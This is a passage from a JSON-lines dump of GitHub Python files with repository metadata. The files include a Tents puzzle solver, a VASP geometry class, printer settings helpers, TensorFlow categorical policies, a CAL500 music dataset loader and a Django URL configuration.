list(\"XTXXXXXXTXXXXTTXXXXX\"),\n list(\"XXTXTXTXTXTXXXTXTXXT\"),\n list(\"TXXTXXXXXXXXXTXXXTXX\"),\n list(\"XXXXXXTXTXXXXXXXXXXX\"),\n list(\"XXXXXXTXXXXXXTXXXXXX\"),\n list(\"TTTXXXXXXXXTTXXXTXXX\"),\n list(\"XXXTXXXXXXTXXXTXXXXT\"),\n list(\"XXXXXXXTXXXXXXXXTTXX\"),\n list(\"XXXXXXXTXXXXXTXTXXXX\"),\n list(\"XXTXXXXXXXTXXXXXXXXX\"),\n list(\"XTXTXXXXXXXXXTXXXXXT\"),\n list(\"XXXXXTXXTXXTXXXXXXXX\"),\n list(\"TXXXXTXXXXTXXXTXXXTX\"),\n list(\"XXTXTXXXTXXXXXXXXTXX\")\n]\n\n\"\"\"\nThe solver is stuck on this 20x20 puzzle. Either there is a bug, or I need to implement more logic into the solver, because currently \nit is being too generous with placing grass. \nI am not entirely sure why this is, because it appears to me that the logic in place should not be allowing such placement, \nbut nonetheless, here we are. :P\n\n\"\"\"\n\ndef printGrid(pause=False):\n for r in range(numberOfRows):\n print(' '.join(grid[r]))\n print()\n if pause: input()\n# printGrid()\n\ndef getCellNeighbours(row, col, onlyAdjacent=False):\n neighbours = [\n [row-1, col-1],\n [row-1, col],\n [row-1, col+1],\n [row, col+1],\n [row+1, col+1],\n [row+1, col],\n [row+1, col-1],\n [row, col-1]\n ]\n\n if onlyAdjacent:\n neighbours = [\n neighbours[1],\n neighbours[3],\n neighbours[5],\n neighbours[7]\n ]\n return neighbours\n\n # print(neighbours)\n \n return neighbours\n \n\ndef setTent(r_, c_):\n \n try:\n grid[r_][c_] = 'A'\n except: \n raise Exception(f\"r:{r_}, c:{c_}\")\n \n # For each placed Tent, set the surrounding 8 cells as Grass:\n neighbours = getCellNeighbours(r_, c_)\n for nR, nC in neighbours:\n if (nR == -1) or (nC == -1) or (nR == numberOfRows) or (nC == numberOfColumns): continue\n if grid[nR][nC] == 'X': grid[nR][nC] = 'G'\n\n\n\n# Can I place a tent here?\ndef validTentPosition(checkRow, checkCol):\n # Needs to be an empty space:\n if grid[checkRow][checkCol] != 'X': return False\n\n currentNeighbours = getCellNeighbours(checkRow, checkCol, True)\n\n adjacentTreeCount = 0\n adjacentTentCount = 0\n for nR, nC in currentNeighbours:\n if (nR==-1) or (nC==-1) or (nR==numberOfRows) or (nC==numberOfColumns): continue\n adjacentTreeCount += int(grid[nR][nC] == 'T')\n adjacentTentCount += int(grid[nR][nC] == 'A')\n \n # Needs to be an adjacent tree:\n if adjacentTreeCount == 0: return False\n \n # Needs to be no adjacent tents: \n if adjacentTentCount > 0: return False\n\n # Needs to be available space to fit into row/col count.\n row = grid[checkRow]\n col = [grid[r][checkCol] for r in range(numberOfRows)]\n if (row.count('A') == rowCounts[checkRow]) or (col.count('A') == columnCounts[checkCol]): return False\n\n return True\n\ndef tentCountMet_FillGrass():\n for r in range(numberOfRows):\n if grid[r].count('A') == rowCounts[r]:\n grid[r] = ['G' if val=='X' else val for val in grid[r]]\n \n for c in range(numberOfColumns):\n col = [grid[r][c] for r in range(numberOfRows)]\n if col.count('A') == columnCounts[c]:\n for r in range(numberOfRows):\n if grid[r][c] == 'X': grid[r][c] = 'G'\n\n\n# for r in range(numberOfRows):\n# for c in range(numberOfColumns):\n# if validTentPosition(r, c): continue\n# if grid[r][c] != 'X': continue\n\n# grid[r][c] = 'G'\n\ndef tentCountEquals_RemainingSpaces():\n for r in range(numberOfRows):\n if grid[r].count('X') + grid[r].count('A') == rowCounts[r]:\n grid[r] = ['A' if val=='X' else val for val in grid[r]]\n \n for c in range(numberOfColumns):\n col = [grid[r][c] for r in range(numberOfRows)]\n if col.count('X') + col.count('A') == columnCounts[c]:\n for r in range(numberOfRows):\n if grid[r][c] == 'X' and validTentPosition(r, c): \n setTent(r, c)\n\n\ndef treeHasOneTentPosition():\n for r in range(numberOfRows):\n for c in range(numberOfColumns):\n if grid[r][c] != 'T': continue\n\n treeAdjacentNeighbours = getCellNeighbours(r, c, True)\n neighbourValues = []\n for nR, nC in treeAdjacentNeighbours:\n if (nR == -1) or (nC == -1) or (nR == numberOfRows) or (nC == numberOfColumns):\n neighbourValues.append('O') # Just using a different letter as a placeholder in the list, so that indexing works in the future\n else:\n neighbourValues.append(grid[nR][nC])\n \n # print(f\"R:{r}, C:{c}\")\n # print(neighbourValues)\n\n if neighbourValues.count('A') == 0 and neighbourValues.count('X') == 1:\n tR, tC = treeAdjacentNeighbours[neighbourValues.index('X')]\n if validTentPosition(tR, tC):\n setTent(tR, tC)\n\ndef canOnlyBeGrass():\n for r in range(numberOfRows):\n for c in range(numberOfColumns):\n if grid[r][c] != 'X': continue\n\n adjacentNeighbours = getCellNeighbours(r, c, True)\n treeAdjacent = False\n for nR, nC in adjacentNeighbours:\n if (nR==-1) or (nR==numberOfRows) or (nC==-1) or (nC==numberOfColumns): continue\n if grid[nR][nC] == 'T': \n treeAdjacent = True\n break\n \n if treeAdjacent == False:\n grid[r][c] = 'G'\n\ndef gridComplete():\n numberOfTents = sum([grid[r].count('A') for r in range(numberOfRows)])\n return numberOfTents == sum(rowCounts)\n \n # for r in range(numberOfRows):\n # if grid[r].count('A') != rowCounts[r]: return False\n \n # return True\n\n\n# while not gridComplete():\nfor _ in range(numberOfColumns * numberOfRows * 10):\n canOnlyBeGrass()\n tentCountMet_FillGrass()\n tentCountEquals_RemainingSpaces()\n treeHasOneTentPosition()\n\n# for r in range(numberOfRows):\n# for c in range(numberOfColumns):\n# if grid[r][c] == 'X': grid[r][c] = 'G'\n\n\nprintGrid()\n\n\n","repo_name":"Dowzer721/vsCode-Sync","sub_path":"Tents&Trees/solver_v1.1.py","file_name":"solver_v1.1.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37291348371","text":"from os.path import join, abspath, dirname, pardir\n\n# Logging format\n#LOG_FORMAT = \"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\"\nLOG_FORMAT = \"%(message)s\"\n\nBASE_DIR = abspath(dirname(__file__))\nCONFIG_FILE = BASE_DIR+\"/options/config.ini\"\n\n# Characters\nCSV_SEP = ';'\nTRACE_SEP = '\\t'\nNL = '\\n' # new line\n\n# Directions\nIN = -1\nOUT = 1\nDIR_NAMES = {IN: \"incoming\", OUT: \"outgoing\"}\nDIRECTIONS = [OUT, IN]\n\n# AP states\nGAP = 0x00\nBURST = 0x01\nWAIT = 0x02\nDICT_STATES = {GAP: \"gap\", BURST: \"burst\", WAIT: \"wait\"}\n\n# Mappings\nDIRS2EP = {OUT: 'client', IN: 'server'}\nEP2DIRS = {'client': OUT, 'server': IN}\nMODE2STATE = {'gap': GAP, 'burst': BURST}\n\n# Histograms\nINF = float(\"inf\")\nNO_SEND_HISTO = -1\n\n# logging levels\nNONE = 7\nINFO = 6\nDEBUG = 5\nVDEBUG = 4\nALL = 3\nDICT_LOGS = {\"NONE\": NONE, \"INFO\": INFO, \"DEBUG\": DEBUG, \"VDEBUG\": VDEBUG, \"ALL\": ALL}\nDICT_LOGS_RVS = {NONE: \"NONE\", INFO: \"INFO\", DEBUG: \"DEBUG\", VDEBUG: \"VDEBUG\", ALL: \"ALL\"}","repo_name":"sebhenri/HyWF","sub_path":"HyWF_code/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"29931901049","text":"import numpy\n\nfrom typing import List, TextIO, Dict\n\n\ndef get_zvals(f: TextIO) -> Dict[str, float]:\n \"\"\"Extract the number of valence electron in a POTCAR file\n \"\"\"\n lines = f.readlines()\n zvals = {}\n\n current_element = None\n for line in lines:\n if 'VRHFIN' in line:\n current_element = line[line.find('=') + 1:line.find(':')]\n if 'ZVAL' in line:\n start = line.find('ZVAL')\n start = line.find('=', start)\n value = float(line[start + 1:start + 8])\n\n zvals[current_element] = value\n\n return zvals\n\n\nclass Geometry:\n def __init__(\n self,\n title: str,\n lattice_vectors: numpy.ndarray,\n ion_types: List[str],\n ion_numbers: List[int],\n positions: numpy.ndarray,\n is_direct: bool = True,\n selective_dynamics: numpy.array = None\n ):\n self.title = title\n self.lattice_vectors = lattice_vectors\n self.ion_types = ion_types\n self.ion_numbers = ion_numbers\n self.selective_dynamics = selective_dynamics\n\n self.ions = []\n for ion_type, ion_number in zip(ion_types, ion_numbers):\n self.ions.extend([ion_type] * ion_number)\n\n self._cartesian_coordinates = None\n self._direct_coordinates = None\n\n if is_direct:\n self._direct_coordinates = positions.copy()\n self._cartesian_coordinates = numpy.einsum('ij,jk->ik', positions, self.lattice_vectors)\n else:\n self._cartesian_coordinates = positions.copy()\n self._direct_coordinates = numpy.einsum('ij,jk->ik', positions, numpy.linalg.inv(self.lattice_vectors))\n\n def __len__(self):\n return sum(self.ion_numbers)\n\n def __str__(self) -> str:\n return self.as_poscar()\n\n def as_poscar(self, direct: bool = True) -> str:\n \"\"\"Get a representation as in a POSCAR, using direct coordinates or not.\n \"\"\"\n\n r = '{}\\n1.0\\n'.format(self.title)\n r += '\\n'.join('{: 16.12f} {: 16.12f} {: 16.12f}'.format(*self.lattice_vectors[i]) for i in range(3))\n r += '\\n{}\\n{}\\n'.format(' '.join(self.ion_types), ' '.join(str(x) for x in self.ion_numbers))\n\n if self.selective_dynamics is not None:\n r += 'Selective dynamics\\n'\n\n if direct:\n r += 'Direct\\n'\n p = self._direct_coordinates\n else:\n r += 'Carthesian\\n'\n p = self._cartesian_coordinates\n\n for i in range(len(self)):\n r += '{: 16.12f} {: 16.12f} {: 16.12f}'.format(*p[i])\n if self.selective_dynamics is not None:\n r += ' {} {} {}'.format(*('T' if x else 'F' for x in self.selective_dynamics[i]))\n\n r += ' {}\\n'.format(self.ions[i])\n\n return r\n\n def to_poscar(self, f: TextIO, direct: bool = True):\n \"\"\"Write a POSCAR in `f`\n \"\"\"\n f.write(self.as_poscar(direct=direct))\n\n @classmethod\n def from_poscar(cls, f: TextIO):\n title = f.readline().strip()\n\n # get lattice vectors\n scaling = float(f.readline())\n lattice_vectors = scaling * numpy.array([[float(x) for x in f.readline().split()] for _ in range(3)])\n\n ion_types = f.readline().split()\n ion_numbers = [int(x) for x in f.readline().split()]\n\n line = f.readline().strip()[0].lower()\n is_selective_dynamics = line == 's'\n\n if is_selective_dynamics:\n is_direct = f.readline().strip()[0].lower() == 'd'\n else:\n is_direct = line == 'd'\n\n # get geometry\n geometry = []\n selective_dynamics = []\n line = f.readline()\n for i in range(sum(ion_numbers)):\n chunks = line.split()\n geometry.append([float(x) for x in chunks[:3]])\n if is_selective_dynamics:\n selective_dynamics.append([x == 'T' for x in chunks[3:6]])\n\n line = f.readline()\n\n positions = numpy.array(geometry)\n selective_dynamics_arr = None\n if is_selective_dynamics:\n selective_dynamics_arr = numpy.array(selective_dynamics, dtype=bool)\n\n return cls(\n title,\n lattice_vectors,\n ion_types,\n ion_numbers,\n positions,\n is_direct=is_direct,\n selective_dynamics=selective_dynamics_arr\n )\n\n def cartesian_coordinates(self) -> numpy.ndarray:\n \"\"\"Convert to cartesian coordinates if any\n \"\"\"\n\n return self._cartesian_coordinates\n\n def direct_coordinates(self) -> numpy.ndarray:\n \"\"\"Convert to cartesian coordinates if any\n \"\"\"\n\n return self._direct_coordinates\n\n def interslab_distance(self) -> float:\n \"\"\"Assume that the geometry is a slab and compute the interslab distance\n \"\"\"\n\n z_coo = self.cartesian_coordinates()[:, 2]\n return z_coo.min() - z_coo.max() + self.lattice_vectors[2, 2]\n\n def slab_thickness(self) -> float:\n \"\"\"Assume that the geometry is a slab (along z) and compute the thickness of said slab\n \"\"\"\n\n z_coo = self.cartesian_coordinates()[:, 2]\n return z_coo.max() - z_coo.min()\n\n def change_interslab_distance(self, d: float, direct: bool = True) -> 'Geometry':\n \"\"\"Assume that the geometry is a slab (along z) and change interslab distance (c axis).\n \"\"\"\n\n z_positions = self.cartesian_coordinates()[:, 2]\n\n # set at zero:\n z_positions -= numpy.min(z_positions)\n\n # get slab size\n slab_size = numpy.max(z_positions)\n\n # get corresponding lattice_vector\n z_lattice_norm = slab_size + d\n\n # re-center slab\n z_positions += d / 2\n\n # create a new geometry\n if direct:\n p = self._direct_coordinates.copy()\n p[:, 2] = z_positions / z_lattice_norm\n else:\n p = self._cartesian_coordinates.copy()\n p[:, 2] = z_positions\n\n new_lattice_vectors = self.lattice_vectors.copy()\n new_lattice_vectors[2] = [.0, .0, z_lattice_norm]\n\n return Geometry(\n self.title,\n new_lattice_vectors,\n self.ion_types,\n self.ion_numbers,\n p,\n is_direct=direct,\n selective_dynamics=self.selective_dynamics\n )\n\n def nelect(self, f: TextIO) -> float:\n \"\"\"Read out the number of valence electrons from a POTCAR (`f`)\n and compute the corresponding number of electrons in the system.\n \"\"\"\n zvals = get_zvals(f)\n nelect = 0\n for n, symbol in zip(self.ion_numbers, self.ion_types):\n nelect += n * zvals[symbol]\n\n return nelect\n","repo_name":"pierre-24/ec-interface","sub_path":"ec_interface/vasp_geometry.py","file_name":"vasp_geometry.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7661912838","text":"# Im a comment (use ctrl + / for comments)\r\n\r\n# Variables\r\nname = \"Sebastian\" # String\r\nlast = \"Ruiz\" # String\r\nage = 22 # Int\r\nfound = False # Bool\r\nprice = 9.99 # Float\r\n\r\n# Print\r\nprint(\"Name: \" + name + \"\\nLast Name: \" + last + str(age))\r\n# OR\r\nprint(\"Name: {name} Last Name: {last} Age: {age}\")\r\n\r\n# IF statements\r\nif age >= 18:\r\n print(name + \" \" + \" Is a grownup!\")\r\nelif age == 100:\r\n print(name + \" \" + \"Is a century old!\")\r\nelse:\r\n print(name + \" \" + \"Is Underage\")\r\n\r\n# Inputs\r\nfound = input(\"Enter\" + name + \" \" + last + \" \" + \"age: \")","repo_name":"SebastianRuiz18/FSDI","sub_path":"108/intro/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13779338796","text":"\"\"\"\nNPA Commands\n------------\n\"\"\"\n\nimport os\nimport logging\nfrom lxk_testlib import rob\n\nROOT_DIR = os.path.dirname(os.path.realpath(__file__))\nFOLDER_PATH = os.path.join(ROOT_DIR, \"constants\", \"_files\")\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.DEBUG)\n\ndef set_value(ip_address, npaid, value):\n \"\"\"\n Set value of the setting of the printer through NPA.\n\n :Parameters:\n\n 1. ip_address, ````\n 2. npaid, ````, Hex NPA Id or npaid string from npaids.enum,\n Int NPA Id or setting name from bundles.xml.\n 3. value, ```` or ````\n\n :Returns: Success ````\n \"\"\"\n LOGGER.debug(ip_address)\n LOGGER.debug(npaid)\n LOGGER.debug(value)\n\n npa_enum_path = os.path.join(FOLDER_PATH, \"npa\", \"npaids.enum\")\n if not os.path.exists(npa_enum_path):\n assert False, \"Could not find \" + npa_enum_path + \"!!!\"\n\n if len(npaid) > 4:\n file = open(npa_enum_path, \"r\")\n lines = file.readlines()\n ret = []\n for x in lines:\n if npaid in x:\n ret = x.replace(\" \",\"\").split('=')\n LOGGER.debug(ret)\n break\n if len(ret) == 2:\n npaid = ret[1].upper().lstrip().rstrip()\n setting = 'ss'\n if value.isdigit():\n if npaid.isdigit():\n setting = 'ii'\n else:\n setting = 'si'\n\n cmd = \"\"\"call system.settings setSetting \"({\"\"\" + setting + \"\"\"})\" setting \"\"\"\\\n + npaid + \"\"\" value \\\"\"\"\" + value + \"\"\"\\\"\"\"\"\n LOGGER.debug(cmd)\n return_output = rob.execute(ip_address, cmd)\n LOGGER.debug(return_output)\n if not return_output[0] or \"success\" not in return_output[1]:\n assert False, \"Unable to set NPAID. {}\".format(return_output[1])\n else:\n return return_output[0]\n\ndef get_value(ip_address, npaid, index_num=None, use_enum_path=True):\n \"\"\"\n Get settings value of the printer using NPA ID.\n\n :Parameters:\n\n 1. ip_address, ````\n 2. npaid, ````, Hex NPA Id or npaid string from npaids.enum.\n\n :Returns: ```` or ````\n \"\"\"\n LOGGER.debug(ip_address)\n LOGGER.debug(npaid)\n LOGGER.debug(index_num)\n\n npa_enum_path = os.path.join(FOLDER_PATH, \"npa\", \"npaids.enum\")\n if not os.path.exists(npa_enum_path):\n assert False, \"Could not find \" + npa_enum_path + \"!!!\"\n\n if len(npaid) > 4 and use_enum_path == True:\n file = open(npa_enum_path, \"r\")\n lines = file.readlines()\n ret = []\n for x in lines:\n if npaid in x:\n ret = x.replace(\" \",\"\").split('=')\n LOGGER.debug(ret)\n break\n if len(ret) == 2:\n npaid = ret[1].upper().lstrip().rstrip()\n\n if index_num:\n index_num = int(index_num) - 1\n if isinstance(npaid, int):\n cmd = \"\"\"call system.settings getIndexedSetting \"(ii)\" \"\"\" + npaid + \" \" + str(index_num)\n else:\n cmd = \"\"\"call system.settings getIndexedSetting \"(si)\" \"\"\" + npaid + \" \" + str(index_num)\n else:\n if isinstance(npaid, int):\n cmd = \"\"\"call system.settings getSetting \"(i)\" \"\"\" + npaid\n else:\n cmd = \"\"\"call system.settings getSetting \"(s)\" \"\"\" + npaid\n LOGGER.debug(cmd)\n returnoutput = rob.execute(ip_address, cmd)\n LOGGER.debug(returnoutput)\n value = \"\"\n if \"status : :i 0\" in returnoutput[1]:\n for ret in returnoutput[1].split(\"\\n\"):\n if \"value : :\" in ret.strip():\n LOGGER.debug(ret)\n if ret.strip() == 'value : :':\n value = ''\n elif 'value : :i' in ret.rstrip():\n value = ret.rstrip().replace('value : :i ', '')\n elif 'value : :bi' in ret.rstrip():\n value = ret.rstrip().replace('value : :bi', '')\n elif 'value : :b' in ret.rstrip():\n value = ret.rstrip().replace('value : :b ', '')\n elif 'value : : bi' in ret.rstrip():\n value = ret.rstrip().replace('value : : bi ', '')\n elif 'value : :' in ret.rstrip():\n value = ret.rstrip().replace('value : : ', '')\n\n LOGGER.debug(value)\n if not returnoutput[0]:\n assert False, \"Unable to get NPAID value. {}\".format(returnoutput[1])\n else:\n return value.strip()\n","repo_name":"TrellixVulnTeam/CloudAutomation_KDSZ","sub_path":"venv/Lib/site-packages/lxk_testlib/npa.py","file_name":"npa.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9071077526","text":"from __future__ import absolute_import, print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom rltools import nn, tfutil\nfrom rltools.distributions import Categorical, RecurrentCategorical\nfrom rltools.policy.stochastic import StochasticPolicy\nfrom rltools.util import EzPickle\n\n\nclass CategoricalMLPPolicy(StochasticPolicy, EzPickle):\n\n def __init__(self, observation_space, action_space, hidden_spec, enable_obsnorm, varscope_name):\n EzPickle.__init__(self, observation_space, action_space, hidden_spec, enable_obsnorm,\n varscope_name)\n self.hidden_spec = hidden_spec\n self._dist = Categorical(action_space.n)\n super(CategoricalMLPPolicy, self).__init__(observation_space, action_space, action_space.n,\n enable_obsnorm, varscope_name)\n\n @property\n def distribution(self):\n return self._dist\n\n def _make_actiondist_ops(self, obsfeat_B_Df):\n with tf.variable_scope('hidden'):\n net = nn.FeedforwardNet(obsfeat_B_Df, self.observation_space.shape, self.hidden_spec)\n with tf.variable_scope('out'):\n out_layer = nn.AffineLayer(net.output, net.output_shape, (self.action_space.n,),\n Winitializer=tf.zeros_initializer,\n binitializer=None) # TODO action_space\n\n scores_B_Pa = out_layer.output\n actiondist_B_Pa = scores_B_Pa - tfutil.logsumexp(scores_B_Pa, axis=1)\n\n return actiondist_B_Pa\n\n def _make_actiondist_logprobs_ops(self, actiondist_B_Pa, input_actions_B_Da):\n return self.distribution.log_density_expr(actiondist_B_Pa, input_actions_B_Da[:, 0])\n\n def _make_actiondist_kl_ops(self, proposal_actiondist_B_Pa, actiondist_B_Pa):\n return self.distribution.kl_expr(proposal_actiondist_B_Pa, actiondist_B_Pa)\n\n def _sample_from_actiondist(self, actiondist_B_Pa, deterministic=False):\n probs_B_A = np.exp(actiondist_B_Pa)\n assert probs_B_A.shape[1] == self.action_space.n\n if deterministic:\n return np.argmax(probs_B_A, axis=1)[:, None]\n return self.distribution.sample(probs_B_A)[:, None]\n\n def _compute_actiondist_entropy(self, actiondist_B_Pa):\n return self.distribution.entropy(np.exp(actiondist_B_Pa))\n\n\nclass CategoricalGRUPolicy(StochasticPolicy):\n\n def __init__(self, observation_space, action_space, hidden_spec, enable_obsnorm, varscope_name,\n state_include_action=True):\n self.hidden_spec = hidden_spec\n self.state_include_action = state_include_action\n self._dist = RecurrentCategorical(action_space.n)\n self.prev_actions = None\n self.prev_hiddens = None\n\n super(CategoricalGRUPolicy, self).__init__(observation_space, action_space, action_space.n,\n enable_obsnorm, varscope_name)\n\n @property\n def recurrent(self):\n return True\n\n @property\n def distribution(self):\n return self._dist\n\n def _make_actiondist_ops(self, obs_B_H_Df):\n B = tf.shape(obs_B_H_Df)[0]\n H = tf.shape(obs_B_H_Df)[1]\n flatobs_B_H_Df = tf.reshape(obs_B_H_Df, tf.pack([B, H, -1]))\n if self.state_include_action:\n net_in = tf.concat(2, [flatobs_B_H_Df, self._prev_actions_B_H_Da])\n net_shape = (np.prod(self.observation_space.shape) + self.action_space.n,)\n else:\n net_in = flatobs_B_H_Df\n net_shape = (np.prod(self.observation_space.shape),)\n with tf.variable_scope('net'):\n net = nn.GRUNet(net_in, net_shape, self.action_space.n, self.hidden_spec)\n\n # XXX\n self.hidden_dim = net._hidden_dim\n\n scores_B_H_Pa = net.output\n actiondist_B_H_Pa = scores_B_H_Pa - tfutil.logsumexp(scores_B_H_Pa, axis=2)\n\n compute_step_prob = tfutil.function([net.step_input, net.step_prev_hidden],\n [net.step_output, net.step_hidden])\n return actiondist_B_H_Pa, net.step_input, compute_step_prob, net.hid_init\n\n def reset(self, dones=None):\n if dones is None:\n dones = [True]\n\n dones = np.asarray(dones)\n if self.prev_actions is None or len(dones) != len(self.prev_actions):\n self.prev_actions = np.zeros((len(dones), self.action_space.n))\n self.prev_hiddens = np.zeros((len(dones), self.hidden_dim))\n\n self.prev_actions[dones] = 0.\n self.prev_hiddens[dones] = self._hidden_vec.eval()\n\n def _make_actiondist_logprobs_ops(self, actiondist_B_H_Pa, input_actions_B_H_Da):\n return self.distribution.log_density_expr(actiondist_B_H_Pa, input_actions_B_H_Da[:, :, 0])\n\n def _make_actiondist_kl_ops(self, proposal_actiondist_B_Pa, actiondist_B_Pa):\n return self.distribution.kl_expr(proposal_actiondist_B_Pa, actiondist_B_Pa)\n\n def _compute_actiondist_entropy(self, actiondist_B_Pa):\n return self.distribution.entropy(np.exp(actiondist_B_Pa))\n\n def _sample_from_actiondist(self, actiondist_B_Pa, deterministic=False):\n probs_B_A = np.exp(actiondist_B_Pa)\n # XXX\n probs_B_A = probs_B_A / probs_B_A.sum(axis=1)[:, None]\n # XXX\n assert probs_B_A.shape[1] == self.action_space.n\n if deterministic:\n return np.argmax(probs_B_A, axis=1)[:, None]\n return self.distribution.sample(probs_B_A)[:, None]\n\n def sample_actions(self, obs_B_Df, deterministic=False):\n B = obs_B_Df.shape[0]\n flat_obs_B_Df = obs_B_Df.reshape((B, -1))\n if self.state_include_action:\n assert self.prev_actions is not None\n net_in_B_Do = np.concatenate([flat_obs_B_Df, self.prev_actions], axis=-1)\n else:\n net_in_B_Do = flat_obs_B_Df\n\n actiondist_B_Pa, hidden_vec = self.compute_step_actiondist(net_in_B_Do, self.prev_hiddens)\n actions_B_Da = self._sample_from_actiondist(actiondist_B_Pa, deterministic)\n prev_actions = self.prev_actions\n self.prev_actions = actions_B_Da\n self.prev_hiddens = hidden_vec\n\n return actions_B_Da, actiondist_B_Pa\n","repo_name":"sisl/rltools","sub_path":"rltools/policy/categorical.py","file_name":"categorical.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"22108073842","text":"import tarfile\nimport pandas as pd\n\nfrom .base import get_data, get_data_dir, get_quantized_data_path\n\nfrom ..preprocess import quantize_mfccs\n\nCAL500_DIR = 'cal500'\nCAL500_TAR = 'CAL500_DeltaMFCCFeatures.tar.gz'\nURL = ('http://calab1.ucsd.edu/~datasets/cal500/cal500data/'\n 'CAL500_DeltaMFCCFeatures.tar.gz')\n\n\ndef fetch_cal500(data_home=None, download_if_missing=True, codebook_size=512):\n r\"\"\"Loader for the CAL500 dataset [1]_.\n\n This dataset consists of 502 western pop songs, performed by 499 unique\n artists. Each song is tagged by at least three people using a standard\n survey and a fixed tag vocabulary of 174 *musical concepts*.\n\n .. warning::\n\n This utility downloads a ~1GB file to your home directory. This might\n take a few minutes, depending on your bandwidth.\n\n Parameters\n ----------\n data_home : optional\n Specify a download and cache folder for the datasets. By default\n (``None``) all data is stored in subfolders of ``~/cbar_data``.\n\n download_if_missing: bool, optional\n If ``False``, raise a ``IOError`` if the data is not locally available\n instead of trying to download the data from the source site.\n Defaults to ``True``.\n\n codebook_size : int, optional\n The codebook size. Defaults to 512.\n\n Returns\n -------\n X : pd.DataFrame, shape = [502, codebook_size]\n Each row corresponds to a preprocessed song, represented as a sparse\n codebook vector.\n\n Y : pd.DataFrame, shape = [502, 174]\n Tags associated with each song in binary indicator format.\n\n Notes\n ------\n\n The CAL500 dataset is downloaded from UCSD's `Computer Audition\n Laboratory's datasets page `_.\n\n The raw dataset consists of about 10,000 39-dimensional features vectors\n per minute of audio content. The feature vectors were created by:\n\n 1.\n Sliding a half-overlapping short-time window of 12 milliseconds over\n each song's waveform data.\n 2.\n Extracting the 13 mel-frequency cepstral coefficients.\n 3.\n Appending the instantaneous first-order and second-order derivatives.\n\n Each song is represented by exactly 10,000 randomly subsampled,\n real-valued feature vectors as a *bag-of-frames*\n :math:`\\mathcal{X} = \\{\\vec{x}_1, \\ldots, \\vec{x}_T\\} \\in\n \\mathbb{R}^{d \\times T}`, where :math:`d = 39` and :math:`T = 10000`.\n\n The *bag-of-frames* features for each song are further preprocessed into\n one *k*-dimensional feature vector with the following procedure:\n\n 1.\n **Encode feature vectors as code vectors.**\n Each feature vector :math:`\\vec{x}_t \\in \\mathbb{R}^d` is encoded as a\n code vector :math:`\\vec{c}_t \\in \\mathbb{R}^k` according to a\n pre-defined codebook :math:`C \\in \\mathbb{R}^{d \\times k}`. The\n intermediate representation for the encoded audio file is\n :math:`\\mathcal{X}_{enc} \\in \\mathbb{R}^{k \\times T}`.\n 2.\n **Pool code vectors into one compact vector.**\n The encoded frame vectors are pooled together into a single compact\n vector. An audio file :math:`x` can now be represented as a single\n *k*-dimensional vector :math:`\\vec{x} \\in \\mathbb{R}^k`.\n\n Specifically, the k-means clustering algorithm is used to cluster all\n audio files' frames into ``codebook_size`` clusters in step 1. The\n resulting cluster centers correspond to the codewords in the codebook.\n Accordingly, the encoding step consists of assigning each frame vector\n to its closest cluster center.\n\n References\n ----------\n\n .. [1] D. Turnbull, L. Barrington, D. Torres, and G. Lanckriet, `Semantic\n Annotation and Retrieval of Music and Sound Effects.\n `_\n IEEE Transactions on Audio, Speech, and Language Processing, vol. 16,\n no. 2, pp. 467-476, Feb. 2008.\n \"\"\"\n data_dir = get_data_dir(data_home, CAL500_DIR)\n tar_path = get_data(URL, data_dir, CAL500_TAR, download_if_missing)\n file_path = get_quantized_data_path(data_dir, codebook_size)\n\n with tarfile.open(tar_path) as tar:\n\n vocab = pd.read_csv(tar.extractfile('vocab.txt'), header=None)\n Y = pd.read_csv(tar.extractfile('hardAnnotations.txt'),\n header=None, names=vocab.values.ravel())\n try:\n X = pd.read_pickle(file_path)\n except IOError:\n delta = [member for member in tar\n if member.name.startswith('delta/')]\n songs = [pd.read_csv(tar.extractfile(song),\n header=None, delim_whitespace=True)\n for song in delta]\n mfccs = pd.concat(songs, keys=range(len(songs)))\n X = quantize_mfccs(mfccs, n_clusters=codebook_size)\n X.to_pickle(file_path)\n\n return X, Y\n","repo_name":"dschwertfeger/cbar","sub_path":"cbar/datasets/cal500.py","file_name":"cal500.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"72399233226","text":"obj_test = {\n 'Obj1':'1.21cm',\n 'Ob2':'2.21cm',\n 'Obj3':'1.21cm',\n 'Obj4':'0.98cm',\n 'Obj5':'1.01cm',\n}\n\nother_obj = {\n k: float(v.strip('cm'))\n for k, v in obj_test.items()\n}\n\nmax_value = max(other_obj.values())\n\nwho = [k for k, v in other_obj.items() if v == max_value]","repo_name":"nmuna520/python_snippets","sub_path":"greater.py","file_name":"greater.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3386749754","text":"from django.urls import path, include\nfrom .views import *\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('api/translate/', translateView),\n path('api/submitcard/', SubmitCard),\n path('api/savecard/', SaveCard),\n path('api/likecard/', LikeCard),\n path('api/readcard/', ReadCard),\n path('api/scoretrans/', ScoreTrans),\n path('api/addtrans/', AddTrans),\n path('api/cheated/', CheatedCardView),\n path('api/succeeded/', SucceededCardView),\n path('api/deletecard/', DeleteCardView),\n path('api/contactform/', SendContactMessage),\n path('api/download//', downloadView),\n path('api/setLang/', SetGuest),\n path('', HomeView),\n path('MyCards/', MyCardsView0),\n path('RecentlyRead/', RecentlyReadView0),\n 